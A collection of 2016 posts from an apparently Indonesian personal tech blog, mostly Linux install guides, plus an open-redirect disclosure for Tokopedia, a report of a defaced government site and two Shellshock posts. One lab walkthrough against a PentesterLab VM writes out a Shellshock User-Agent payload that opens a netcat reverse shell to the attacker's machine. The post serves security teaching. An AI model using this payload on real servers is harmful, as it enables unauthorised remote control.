Kamis, 20 Oktober 2016

Cara Install Ruby di Ubuntu 16.04

Assalamualaikum warahmatullahi wabarakatuh...

Kali ini saya akan menjelaskan bagaimana instalasi ruby pada linux. Untuk testing saya menggunakan Linux Ubuntu 16.04.

Ruby adalah bahasa pemrograman dinamis berbasis skrip yang berorientasi obyek. Tujuan dari ruby adalah menggabungkan kelebihan dari semua bahasa-bahasa pemrograman skrip yang ada di dunia. Ruby ditulis dengan bahasa pemrograman C dengan kemampuan dasar seperti Perl dan Python.

Ruby juga memiliki berbagai framework diantaranya adalah :
Ruby On Rails (ROR)
- Sinatra
- Lotus
- Padrino
- Nyny
- Grape
- Nancy
- dan lain - lain

Baiklah untuk melakukan instalasi ruby pada linux, kita menggunakan RVM (ruby version manager). Berikut adalah tahapan untuk melakukan instalasi ruby.

Buka terminal lalu install public key terlebih dahulu dengan perintah,
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
Lalu kita melakukan instalasi ruby yang paling stable dengan perintah 
\curl -sSL https://get.rvm.io | bash -s stable --ruby
Kemudian lakukan path pada linux, buka file environment dengan sintak
sudo gedit /etc/environment
kemudian masukkan sintak
RVM_HOME=/home/purwo/.rvm 
pada bagian PATH masukkan
/home/purwo/.rvm/bin
jangan lupa sesuaikan dengan folder anda. 
Restart komputer dan cek versi rvm, ruby dan gem dengan perintah,
rvm --version
ruby --version
gem --version
Jika anda ingin mengubah versi ruby menjadi versi yang lain, silahkan lakukan perintah berikut untuk mengahapus default ruby yang digunakan.
rvm reset
Kemudian silahkan jalankan perintah berikut untuk memilih ruby yang akan anda gunakan.
rvm alias create default {versi ruby}
Contoh :
rvm alias create default 2.3.0 
Jika sudah, maka tahap selanjutnya adalah install bundler. Bundler ini sendiri berfungsi untuk mendownload dependency library yang dibutuhkan oleh project kita nantinya. Bedanya bundler dengan gem yaitu gem hanya sebagai penentu dari versi library yang akan kita gunakan sedangkan bundler akan mendownload semua kepentingan dari project dan akan memeriksa apakah sebuah library mempunyai missing dengan library yang lainnya. install bundler dengan perintah. 
gem install bundler
kemudian cek versi bundler dengan perintah
bundler --version 
 Untuk melihat versi ruby yang telah diinstall di pc maka perintahnya
rvm list
jika ingin mengetahui versi release ruby dengan perintah
rvm list known
Sekian tutorial kali ini dan selamat coding ruby. Terima kasih :)
Wassalamualaikum warahmatullahi wabarakatuh...

Rabu, 28 September 2016

Install Download Manager (XDM) di Ubuntu 16.04

Assalamualaikum warahmatullahi wabarakatuh...
Salam para penggemar linux, :-D

Tema kali ini yaitu Download Manager, bagi para pengguna yang baru mencicipi dunia open source (baru mau hijrah :v) dari  windows, pasti terkadang masih banyak keluhan, terutama di program Aplikasinya, contoh sederhana ketika dulu sedang mendownload menggunakan windows kecepatannya cenderung tinggi karena menggunakan IDM, sedangkan di linux sedikit kurang memuaskan. berhubung IDM sebenarnya tidak cocok di install di linux (sebenarnya bisa menggunakan wine) tetapi kadang crash. nah pada kesempatan kali ini saya akan berbagi tutorial install Download Manager XDM (Pengganti IDM di linux).

langsung saja,
testing kali ini di sistem operasi ubuntu 16.04 x64 (64 bit)
Buka Terminal, dan ketikan perintah berikut :
wget http://sourceforge.net/projects/xdman/files/xdm-jre-64bit.tar.xz
untuk 32 bit :
wget http://sourceforge.net/projects/xdman/files/xdm-jre-32bit.tar.xz
Kemudian ekstrak file  :
tar -xvf xdm-jre-64bit.tar.xz
untuk 32 bit :
tar -xvf xdm-jre-32bit.tar.xz
selanjutnya masuk folder xdm, yang sebelumnya sudah diekstrak,
cd xdm/
lalu jalankan programmnya :
./xdm
Test download :
Sekian dan Terima Kasih.
Wassalamualaikum warahmatullahi wabarakatuh...

Minggu, 18 September 2016

Membuat Hotspot (Virtual Wifi) di Kali Linux

Assalamualaikum warahmatullahi wabarakatuh...
Disini saya akan berbagi tutorial bagaimana cara membuat Hotspot (Virtual Wifi) di Kalix Linux. testing menggunakan Kali Moto (versi 1.0.5) oke langsung saja.

Chek Hardware
Buka terminal dan masuk sebagai super user. dengan cara membuka terminal dan ketikkan perintah:
sudo -i
Chek kebutuhan hardware wireless anda, apakah support untuk dijadikan wireless Access Point apa tidak. Caranya dengan mengechek menggunakan perintah di bawah ini di terminal. 
lspci -k | grep -A 3 -i "network"
pastikan pada Kernel driver in use adalah ath9k atau ath5k karena hardware dengan driver ini yang support di jadikan access point. 
Install Software
Jika pada step pertama hardware anda lolos uji ITP dan IPB maka anda dapat melanjutkan pada step yang kedua ini, yaitu proses installasi software yang di butuhkan. Software yang kita butuhkan adalah hostapd dan dnsmasq yang biasanya sudah tersedia pada repository dan dapat di unduh secara gratis. Harap di ingat, dalam proses kali ini saya menggunakan Distro Kali Linux, jadi perintah perintah di terminal mungkin ada sedikit yang berbeda, jadi bagi pengguna distro linux lain (Mis: openSUSE, Fedora, Archlinux) harap menyesuaikan.
Untuk menginstall paket yang di butuhkan kita menggunakan perintah di bawah ini pada terminal.
sudo apt-get install hostapd dnsmasq
Tunggu Proses installasi selesai.
Stop Service
Pada langkah ini kita akan menghentikan dan men-disable service hostpad dan dnsmasq. Jadi service akan di gunakan pada saat kita membutuhkanya saja. Lakukan perintah berikut pada terminal.
sudo service hostapd stop
sudo service dnsmasq stop
sudo update-rc.d hostapd disable
sudo update-rc.d dnsmasq disable

Buat Konfigurasi dnsmasq
Selanjutnya adalah membuat file konfigurasi pada kedua aplikasi tersebut. Pertama kita membuat konfigurasi dnsmasq, aplikasi ini kita gunakan sebagai DHCP server, yang berfungsi memberikan IP addres kepada client yang tersambung ke Hotspot kita nantinya.
Buka file konfigurasi dnsmasq menggunakan text editor kesayangan anda (mis: gedit, nano, vi, geany), di sini saya menggunakan nano.
nano /etc/dnsmasq.conf
 Copy dan paste script konfigurasi di bawah ini pada akhir baris file /etc/dnsmasq.conf
# Bind to only one interfacebind-interfaces
# Choose interface for binding
interface=wlan0
# Specify range of IP addresses for DHCP leasses
dhcp-range=192.168.150.2,192.168.150.10
anda dapat menentukan range IP yang akan diberikan kepada client, anda dapat mengubah parameter dhcp-range.
Buat Konfigurasi hostapd
Selanjutnya kita akan mengatur konfigurasi hostapd, di sini meliputi konfigurasi Nama SSID (nama wifi) dan juga menentukan password. Seperti langkah 4 kita buka file konfigurasi nya menggunakan perintah seperti di bawah ini.
sudo gedit /etc/hostapd.conf
Tambahkan script konfigurasi seperti dibawah ini.
# Define interface
interface=wlan0
# Select driver
driver=nl80211
# Set access point name
ssid=@purwo.id
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=6
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=2
wpa_passphrase=123456789
yang perlu anda ubah adalah ssid dan wpa_passphrase, silahkan sesuaikan dengan keinginan anda.
Membuat Script Executor
Selanjutnya adalah membuat script untuk mengexecute kedua program tersebut secara bersamaan, sebenarnya bisa dilakukan dengan manual, tapi karena terlalu banyak parameter jadi sebaiknya menuliskan perintahnya dalam sebuah script. buatlah file dengan nama bebas misalkan startwifi, mulaiwifi, dan lain sebagainya. Tentunya menggunakan terminal dan text editor kesayangan anda.
nano /usr/bin/wifi_start
Isikan script seperti dibawah ini pada file tersebut.
#!/bin/bash
# Start
# Configure IP address for WLAN

sudo ifconfig wlan0 192.168.150.1
# Start DHCP/DNS server
sudo service dnsmasq restart
# Enable routing
sudo sysctl net.ipv4.ip_forward=1
# Enable NAT
sudo iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
# Run access point daemon
sudo hostapd /etc/hostapd.conf
# Stop
# Disable NAT

sudo iptables -D POSTROUTING -t nat -o ppp0 -j MASQUERADE
# Disable routing
sudo sysctl net.ipv4.ip_forward=0
# Disable DHCP/DNS server
sudo service dnsmasq stop
sudo service hostapd stop
Nb: pada baris iptables, di situ tertulis ppp0 karena saya menggunakan modem sebagai media sumber koneksi internet.  jika anda menggunakan LAN sebagai sumber internetnya silahkan di ganti dengan eth0.

Simpan file tersebut dan kembali ke terminal, lakukan finishing dengan mengubah attribut file tersebut menjadi executable, dengan perintah seperti di bawah ini.
sudo chmod +x  /usr/bin/wifi_start
Dan terakhir jalankan script dengan mengetikan perintah wifi_start di Terminal 
Selesai, sekian Wassalamualaikum warahmatullahi wabarakatuh...

Sabtu, 17 September 2016

Open Redirection Vulnerability Tokopedia

Assalamualaikum warahmatullahi wabarakatuh...

Selamat pagi, kesempatan kali ini saya akan membahas celah terbaru yang ditemukan oleh anggota Team dari Cyber Security IPB di web startup juga toko online yaitu Tokopedia. Mereka juga telah membuat POC (Proof Of Concept). berikut ini saya akan jabarkan ulasan dari mereka. Oke langsung saja,

Open Redirection Vulnerability
Tokopedia - 16/09/16

Summary

Celah : Open Redirection Vulnerability
Resiko : Dapat melakukan redirect user tokopedia ke halaman situs penyerang.

Proof Of Concept
Dapat melakukan eksploitasi Open Redirection Vulnerability dengan merubah parameter “url” di https://accounts.tokopedia.com/logout?url=.

Link Video PoC:
https://accounts.tokopedia.com/logout?url=https://drive.google.com/open?id=0By3ArX8ZAWHDcHZTand0S01ld3M


Worst Case Scenario
Mengkombinasikan dengan CSRF
Anggap terdapat penyerang yang telah menemukan celah CSRF di api tokopedia dan membuat web phising di maliciousurl.com untuk mentrigger CSRF pada user yang mengunjunginya. Penyerang melakukan phising ke user untuk melakukan kunjungan ke maliciousurl.com namun user tidak melakukan klik karena url mencurigakan yaitu maliciousurl.com. Penyerang dapat mengakalinya dengan mengeksploitasi Open Redirection Vulnerability di tokopedia agar url vectornya terlihat valid sehingga user dapat percaya pada url tersebut.
Before Open Redirection:
http://maliciousurl.com -> untrusted url

Menjadi servis url redirection
Sama halnya goo.gl, bit.ly, dan tinyurl.com. Halaman ini https://accounts.tokopedia.com/logout?url= memiliki fungsi yang sama yaitu untuk meredirect sehingga attacker dengan mudah redirect halaman berbahaya melalui domain tokopedia.

Saran Patching
Melakukan pengecekan alamat apakah dari domain tokopedia atau bukan.


Celah ini sudah ditutup (fix) oleh pihak dari Tokopedia.
Sekian.
Wassalamualaikum warahmatullahi wabarakatuh...

Rabu, 07 September 2016

Install Exiftool di Kali Rolling (2016.1)

Assalamualaikum warahmatullahi wabarakatuh...
Pada pagi ini saya akan share cara install tool "exiftool" di Kali Rolling, Exiftool sendiri adalah tool untuk analysis metadata dari sebuah file.
Pertama update terlebih dahulu :
apt-get update
install exiftool dengan perintah
apt-get install libimage-exiftool-perl
Tunggu proses installasi selesai,
Exiftool biasanya dipakai oleh para penggiat IT khususnya IT Security, jika anda mengenal lomba CTF atau pernah mengikutinya pasti tidak asing dengan tool ini. sekian semoga ada manfaatnya.
Wassalamualaikum warahmatullahi wabarakatuh...

Senin, 05 September 2016

Install Zekr (Qur'an Digital) di BackBox Linux

Assalamualaikum warahmatullahi wabarakatuh...
Zekr adalah aplikasi Al-Qur’an digital. Kita dapat mendengar lantunan bacaan Al-Qur’an dengan aplikasi ini. Kita dapat juga memilih surat yang ingin kita dengarkan, selain itu dibawah ayat tersebut juga dilengkapi dengan terjemahan. Untuk defaultnya menggunakan bahasa Inggirs, tapi kita dapat menggantinya seperti bahasa Indonesia, dll. Zekr dibuat menggunakan bahasa pemrograman Java. Jadi Zekr tersedia untuk OS Linux, Windows, dan Mac OS. Berikut ini tutorial install Zekr di Baxbox.
Sebelum menginstallnya kita tambahkan PPA dahulu agar semua paket dapat di install. untuk menginstallnya buka "Terminal" lalu ketikan perintah :
sudo add-apt-repository ppa:sabily.team/ppa
Setelah itu Update BackBox, dengan perintah :
sudo apt-get update
Install paket pelengkap dahulu supaya tampilannya kece :-D
sudo apt-get install ttf-me-quran ttf-sil-scheherazade ttf-farsiweb
Setelah itu kita install Qur'an dan Translations bahasa indonesianya, untuk menginstall ketikan perintah berikut :
sudo apt-get install zekr zekr-quran-translation-id-indonesian
Selesai, tinggal buka aplikasinya dimenu Bacxbox : Accessories > Zekr.
Nah untuk mendownload Translations lain bisa mendownloadnya di http://zekr.org/resources.html#translations .
Nah tinggal pilih tuh sesuai Translation yang kamu inginkan, dan untuk mendownload Recetations dari Sheikh - Sheikh agar bisa memutarnya secara Offline bisa download disini.
Untuk yang mengalami masalah dalam penginstallan bisa ditanyakan di Komentar, oh ya bagi yang mau CoPas artikel ini dimohon cantumkan link sumber yah, sebagai penghargaan terhadap penulis. Sekian Terima Kasih.
Wassalamualaikum warahmatullahi wabarakatuh...

Sabtu, 27 Agustus 2016

Mengatasi Error Update "sub-process http received a segmentation fault" di Kali Rolling

Assalamualaikum warahmatullahi wabarakatuh...
Hari ini saya akan share bagaimana cara mengatasi update error di Kali Rolling (2016.1) , error ini muncul ketika melakukan "apt-get update" dan muncul tulisan error "E: Method http has died unexpectedly!" dan "E: sub-process http received a segmentation fault". nah dalam masalah ini ada yang menyelesaikannya dengan mengganti Repository dengan yang tidak resmi yaitu "deb http://mirror.nus.edu.sg/kali/kali kali-rolling main non-free contrib" nah menurut saya ini tindakan yang salah karena memasukan repo tidak resmi kedalam source.list Kali Linux. Didalam artikel saya ada bahasan mengenai Repository yang resmi dan saya kutip angsung dari kali.org. berikut artikelnya : Repo Kali Linux All Version. kembali ketopik utama ini adalah cara yang saya sarankan lakukan ketikan didapati error yang sudah saya jelaskan tadi diatas.

1. Kunjungi apt's directory of Kali's repository directly (http://http.kali.org/pool/main/a/apt/).
2. Download libapt-pkg5.0_1.3~pre3_*.deb (dimana * adalah architecture Kali Rolling i386/amd64)
3. Download apt_1.3~pre3_*.deb (dimana * adalah architecture Kali Rolling i386/amd64) 
4. Uninstall apt by apt-get remove apt, dan catat paket apa saja yang terhapus

5.  Install libapt-pkg5.0_1.3~pre3  dengan perintah :
dpkg -i libapt-pkg5.0_1.3~pre3_*.deb
6.  Install apt_1.3~pre3_ dengan perintah :
dpkg -i apt_1.3~pre3_*.deb
7. update kembali Kali Linux :
apt-get update
Done...
8. Install kembali paket yang terhapus ketika "step 4". Kalo ngga salah berikut adalah paket yang terhapus :

apt apt-listchanges apt-utils emdebian-archive-keyring python-reportbug reportbug tasksel tasksel-data

Sekian, mudah - mudahan bermanfaat... 
Wassalamualaikum warahmatullahi wabarakatuh...

Senin, 22 Agustus 2016

Hacker Retas Website DPRD Kabupaten Pacitan

Assalamualaikum warahmatullahi wabarakatuh... 
Pagi ini saya akan melaporkan kejadian peretasan situs Pemerintah oleh Hacker dengan Nick Name : Yukinoshita 47 , kemungkinan peretasan ini dilakukan karena tidak puas dengan kinerja pemerintahan yang tidak adil, hal ini sesuai dengan pesan yang ditinggalkan oleh Hacker tersebut yaitu :

Pak Pejabat Yth

Tolong Pak Copot dan Pecat aja semua
Oknum-Oknum PNS dan Pejabat Instansi Pemerintah Terutama Dinas PU dan Dinas Lain yang sering ngadakan tender proyek pemerintah
Kagak Asik Banget Pak Gaji Udah Gede 
Kami Sebagai Kontraktor dan Konsultan Jasa Konstruksi
Capek-Capek Kerja yang nikmati Hasil nya
oknum-oknum PNS, Kuasa Pengguna Anggaran, Pejabat Pembuat Komitmen, Kepala Dinas dan Pihak-Pihak Terkait
Enak Bener ya Jadi PNS dan Kerja Di Instansi Pemerintah yang sering ngadakan Tender Proyek APBD dan APBN 
Kami Sebagai Kontraktor kalo mau dapat proyek harus setor duit dulu 20% dari HPS Proyek nya
Belum Lagi Kami Harus bayarin kedai kopi, bayarin pelacur nya (dia yang ngecroot kami yang bayar enak bener kan), bayarin duit buat entertainment nya dan duit-duit lainnya
Kenapa Aspal Sering Bolong, Bangunan dan Infrastuktur sering kropos ?
Ya iyalah coeg duit yang seharus nya udah modal kerja kami
udah habis buat isi kantong oknum-oknum instansi pemerintah
belum lagi konsultan pengawasan nya nodong kami kalo kagak setor duit ya kami yang habis kena bacod dan bully massal :v wkwkwk
Wajar dong kami sering beli bahan-bahan yang kualitas nya jelek buat nekan biaya biar kerjaan selesai
Udah itu aja pak tolong ya pak copot aja oknum-oknum yang melakukan korupsi berjamaah itu 
di Instansi nya saya melakukan ini hanya iseng sambil menceritakan semua kenyataan dilapangan
biar situs anda tidak ada lagi yang meretas nya gampang pak update CMS ke versi baru,install Honeypot dan aktifkan Web Application Firewall

Untuk Bapak Dewan Perwakilan Rakyat Daerah Yang Kami Cintai, Dari Rakyat Mu Yukinoshita 47

We Are Garuda Security Hacker, We Are Simple Team Not Underground, And No Army Can Stop Idea

Salam Hangat Buat Calon Istri Gw Yang Mirip Yukinoshita Yukino dan Semua Member Garuda Security Hacker

Sampai berita ini diturunkan belum ada perbaikan diwebsite tersebut :
Site : http://dprd.pacitankab.go.id/

Screenshot :

Oke sekian dulu berita dari saya...

Wassalamualaikum warahmatullahi wabarakatuh... 

Vulnerability Local Root Exploit di Grombyang OS 2.0

Assalamualaikum warahmatullahi wabarakatuh... 
Selamat Malam, Disini saya akan membahas mengenai celah keamanan Local Root Exploit lagi, kali ini saya temukan ketika saya coba Testing celah keamanan ini pada Operating System Karya Anak Bangsa Indonesia, sekaligus yang berasal Kota saya sendiri Pemalang, yaitu Grombyang OS. Saya melakukan testing ini secara live pada versi 2.0 melalui media virtual machine VMware. langsung saja, berikut ini adalah script yang saya gunakan untuk melakukan Exploit :
-------------------------------------------------------------------------root.c---------------------------------------------------------------------------------------
Screenshot :
Youtube Video :
Sekian dulu yah, 
Wassalamualaikum warahmatullahi wabarakatuh... 
PoC : https://www.exploit-db.com/exploits/37292/

Sabtu, 20 Agustus 2016

Testing Shellshock di Server Kali Linux 1.0.6

Assalamualaikum warahmatullahi wabarakatuh... 

Testing Server
Untuk melakukan percobaan terhadap sistem yang bermasalah, sistem operasi yang digunakan adalah Kali Linux 1.0.6 yang masih menggunakan Linux Kernel 2.6.x dan memiliki versi bash yang vulner. Untuk melihat apakah komputer korban bermasalah atau tidak, perintah bash bisa digunakan seperti contoh berikut ini:

Hal lain yang bisa dilakukan adalah dengan melakukan reverse connection dengan menjalankan netcat pada target server. Sekarang, mari kita lakukan simulasi serangan dimulai dengan scanning terhadap komputer korban. Pada percobaan ini saya menggunakan server VM cve-2014-6271.iso, jika Anda belum mempunyai server ini, maka bisa mengunduhnya di link https://s3.amazonaws.com/pentesterlab/cve-2014-6271.iso yang memang dirancang untuk serangan Shellshock. Scanning yang kita lakukan adalah scanning direktori menggunakan :
Dirbuster [IP_Target]
Pada contoh ini terlihat bahwa kita telah mendapatkan bug shellshock pada komputer korban yaitu pada direktori cgi-bin/ .
Selanjutnya, kita akan melakukan scanning kembali pada direktori cgi-bin untuk memastikan file apa saja yang ada pada direktori tersebut menggunakan wordlist yang disediakan dirbuster.
Asumsi pada tahap ini adalah kita sudah mengetahui pada server ini telah menggunakan versi bash yang vulner terhadap Shellshock. Selanjutnya kita akan melakukan scanning terhadap korban dengan perintah. 
nmap [IP_Target]
Setelah mengetahui bahwa port 80 terbuka, kita mencoba membuka web server target menggunakan browser yang bernama Mantra. Mantra adalah sebuah aplikasi Web Browser yang disediakan oleh OWASP Corporation untuk mengganti settingan proxy secara cepat. Namun, jika pada Kali Linux Anda tidak memilki mantera Anda dapat menginstall package Mantra melalui command berikut: 
wget –c http://tenet.dl.sourceforge.net/project/getmantra/Mantra%20Security%20Toolkit/Janus%20-%200.92%20Beta/OWASP%20Mantra%20Janus%20Linux%2032.tar.gz
Alternatif lain, kita juga dapat menggunakan Ice Weasel, yaitu Browser bawaan Kali linux
Kita akan melakukan pengaturan pada konfigurasi proxy pada browser mantra .
Hal pertama adalah menambahkan pengaturan proxy yang baru pada browser Mantra atau Ice Weasel, proxy yang kita tambahkan adalah proxy local, yaitu 127.0.0.1. Pengaturan ini dilakukan agar data yang dikirimkan melewati local machine (Kali Linux) kita.
Untuk penamaan proxy, kita namakan “Local Proxy“
Selanjutnya kita memasukkan proxy 127.0.0.1, yaitu proxy localhost
Kemudian, kita akan menangkap data yang masuk ke Burpsuite, dengan cara mengaktifkan proxy tersebut dan membuka halaman web server yang tadi kita buka. Setelah itu, Burpsuite akan menangkap data yang lewat melalui proxy
Setelah ditangkap, data tersbut kita kirimkan ke repeater dengan cara klik kanan kolom yang berisi header data, lalu pilih “send to repeater”.

Kemudian, kita akan berpindah ke tab repeater. Repeater ini berfungsi untuk memanipulasi secara manual dan memproses pengiriman data HTTP (HTTP
Request) secara individual (setiap data yang dikirimkan.

Di sini kita dapat mengubah header data yang akan kita kirimkan dan melihat respon data yang dibalas oleh si web server Sebelumnya, kita harus memeriksa konfigurasi IP address kita sebagai penyerang dengan perintah: 
ifconfig
Dan untuk melakukan reverse connection, kita akan menjalankan netcat sebagai server untuk listen connection, yaitu si korban. Reverse Connection adalah sebuah teknik untuk masuk pada sebuah sistem (mesin) melalui port yang terbuka pada target, cara ini otomatis akan melewati proteksi (bypass) oleh firewall.
Langkah selanjutnya kita akan mengubah content dari User Agent yang sebelumnya adalah sebuah data User Agent dari HTTP request menjadi kode Shellshock ditambah , yaitu:
() { :; }; /bin/bash –c “nc 192.168.18.130 4444 –e /bin/bash –i”
Ket :
() { :; };      = Kode shellshock yang diinjeksi pada celah kemanan shell di server target
/bin/bash = Aplikasi bash yang dijalankan pada target server di direktori /bin/bash
-c             = Parameter untuk memerintahkan menjalankan mengeksekusi program shell
nc            = Menjalankan program netcat
192.168.18.130 4444 = IP dan PORT Target
-e     = Sama seperti “-c”, menjalankan eksekusi shell, namun “-c” dijalankan setelah /bin/bash command 
-i   =  Delay untuk interval setiap command dimasukkan,kita tidak memasukkan nilai di sini, berarti nilai defaultnya adalah 0

Kode shellshock ini berfungi untuk melakukan injeksi shell untuk penyerangan Shellshock.
Langkah selanjutnya adalah melihat status dari netcat yang tadi kita jalankan, jika berhasil dengan memberikan respon koneksi, maka kita dapat menjalankan command Bash pada target tersebut, sebagai contoh kita dapat melihat file /etc/passwd:
Selesai, 
Wassalamualaikum warahmatullahi wabarakatuh... 

NOTE : JADI SAYA SANGAT MENYARANKAN AGAR SEMUA TEKNIK HACKING YANG ANDA PEROLEH INI DIPERGUNAKAN DALAM RANAH ETHICAL HACKING. ARTINYA JANGAN MENGGUNAKAN TEKNIK2 TERSEBUT UNTUK MELAKUKAN HACKING KE DALAM SISTEM YANG TIDAK MEMBERIKAN IZIN KEPADA ANDA UNTUK MELAKUKANNYA. SEMUA AKSES SISTEM PADA TUTORIAL/SIMULASI INI 100% LEGAL. SISTEM TERSEBUT BERASAL DARI LAB YANG SAYA BUAT UNTUK KEPERLUAN PRAKTEK, BAIK SEPERTI ROUTER, SWITCH, HUB, OS DLL. JADI JIKA ANDA INGIN MEMPRAKTEKANNYA SILAKAN MEMBUAT LAB KECIL2AN SEPERTI YANG SAYA LAKUKAN!

Rabu, 17 Agustus 2016

Ternyata Masih Ada Celah Shellshock Attack di Kali Linux 1.x (Kali Moto)

Assalamualaikum warahmatullahi wabarakatuh... 
Dunia keamanan komputer dikejutkan kembali setelah sebelumnya muncul bug berbahaya yang menyerang SSL, yaitu Heartbleed. Namun sekarang ada Shellshock atau Bash bug yang dikatakan lebih berbahaya. 

Shellshock ini bisa digunakan pada setiap server dengan sistem operasi Linux atau Mac dan Shell yang memakai Bash (Bourne-Again Shell). Pada tanggal 24 September 2014, sebuah celah keamanan pada aplikasi Bash yang dimiliki oleh sistem operasi Linux dengan Kernel versi 2.6x ditemukan oleh beberapa peneliti profesional di bidang keamanan jaringan. Celah keamanan ini dinamakan Shellshock, celah ini dapat mengeksploitasi beberapa sistem dan djalankan secara remote ( jarak jauh) ataupun secara lokal. Bash sangat penting karena Bash ini adalah komponen vital dalam menjalan proses di Linux, dan banyak program yang bergantung padanya. Salah satu yang terpopuler adalah Apache HTTP Server. 

Celah ini sudah ada sejak versi 4.3 atau sudah 25 tahun lamanya dan baru disadari sekarang. Untungnya dari pencarian log akses server yang memanfaatkan lubang atau bug ini juga baru – baru saja diamankan. Berikut adalah cara kerja Shellshock:
  • Celahnya terletak pada bagaimana cara Bash meng-handle data yang dikirimkan, padahal data tersebut bisa dimanipulasi oleh penyerang dengan mengganti ke command yang tidak diduga, yang disebut sebagai “command injection
  • Seorang penyerang dapat melakukan eksploitasi menggunakan shellshock dengan meng-inject program backdoor ke server. Ketika server target sudah disusupi dan dikendalikan oleh si penyerang, maka mereka dapat memasukkan beberapa program “jahat” lainya untuk mencuri data, menyerang komputer lain, atau melakukan serangan DDOS.

Test Shellshock
Ketika saya mencobanya di OS Kali Linux 1.0.5 ternyata tak disangka ada celah ini didalamnya, ternyata sistem operasi yang terkenal dibidang pentest ini belum menjamin OS ini aman dari segala macam ancaman. salah satunya adalah Shellshock ini. disini saya menggunakan Proof-of-Concept (POC) code untuk melihat bagaimana celah ini dapat dieksploitasi. cara testingnya cukup mudah cukup ketikan perintah berikut di Terminal,
env x='() { :;}; echo [!]Vulnerable Shellshock[!]' bash -c "echo Testing by @purwowidodo"
Code di atas berfungsi untuk mendeklarasikan sebuah variable environment pada sistem lalu menampilkan kata “test”. Seharusnya, dari proses manipulasi nilai variable environment, Bash mengeksekusi kode tersebut sebagai sebuah fungsi, seperti di bawah ini:
() { :; }; echo vulnerable
Saat suatu sistem memiliki celah dan dideklarasikan sebagai sistem yang “vulnerable”, si penyerang dapat mengeksekusi beberapa perintah jahat (berbahaya) setelah code dimasukkan (injection).

Pencegahan yang dapat dilakukan
Cara pencegahan dari Shellshock Attack ini ada beberapa cara yaitu :
  1. Memasang anti-virus pada server untuk menangkal malware yang dipasang di server Anda, seperti Linux, UNIX, atau OS X.
  2. Memasang firewall pada aplikasi web Anda dan Intrusion Prevention System (IPS) rules untuk mencegah pengiriman request Shellshock pada server Anda.
  3. Proteksi khusus ancaman pada server Anda, seperti program anti malware ataupun monitoring traffic pada server Anda.
UnixBash adalah program yang sudah banyak digunakan oleh sistem operasi Unix pada beberapa sistem dan software, serta Shellshock berefek pada versi 1.14 – 4.3 GNU Bash, khususnya:
Ini adalah sebuah tabel yang biasa digunakan dan versi shell default yang digunakan OS tersebut. Sistem operasi yang memiliki program Bash yang “vulnerable”.
Oke dah dulu yah, diartikel selanjutnya saya akan coba mempraktekan celah keamanan ini, semoga yang sedikit ini ada manfaatnya buat pengetahuan dalam IT Security.  Wassalamualaikum warahmatullahi wabarakatuh...